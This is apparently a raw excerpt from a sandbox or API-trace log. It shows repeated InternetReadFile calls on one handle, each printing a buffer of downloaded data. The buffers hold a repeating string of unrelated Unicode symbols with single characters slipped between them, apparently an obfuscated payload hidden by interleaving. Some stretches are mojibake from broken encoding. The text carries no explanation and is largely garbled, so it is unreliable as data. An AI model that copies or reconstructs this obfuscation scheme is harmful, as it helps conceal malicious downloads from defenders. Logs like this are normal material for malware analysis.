☱⟎⡳᳚˕Ҏdмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏlмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ4мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎYмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏuмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎIмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ9мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎWмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏkмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ4мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏbмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏpмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎIмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎLмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎJмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎEмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ8мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎLмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎIмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ8мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏbмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏlмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳á
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: ³šË•ÒŽ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎFмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ0мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎLмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎUмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏdмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎNмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎUмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏdмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏoмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ8мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎZмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏoмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏcмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎVмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎEмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏkмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎJмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏpмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ4мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎSмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏuмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎYмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏbмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏrмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎUмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎKмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏkмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ4мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏdмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏsмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎLмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎFмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏsмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏbмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏiмá¨
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: ²á‡•áŠ¥áŽ‡á‡«á®žâ­â™â˜±âŸŽâ¡³á³šË•ÒŽ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏoмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎZмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏjмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎWмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏdмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎFмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ0мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎIмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎJмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏhмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎUмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏcмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ0мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏkмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏbмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏpмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎZмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏsмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏcмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎJмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏsмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏcмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎJмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏsмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏcмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎJмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏsмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏcмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏhмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎMмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎUмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇá
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: ‡«á®žâ­â™â˜±âŸŽâ¡³á³šË•ÒŽvмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎJмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏsмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏcмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎJмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏsмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏcмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎJмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏsмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏcмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎJмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏsмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏcмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎJмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏsмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏcмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎJмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏsмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏcмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎJмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏsмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏcмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎJмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏsмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏcмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎJмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏsмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏcмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎJмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏsмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏcмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎJмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏsм
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: ᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏcмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎMмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: ☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏnмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎJмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏnмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏkмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎKмᨲᇕእᎇᇫ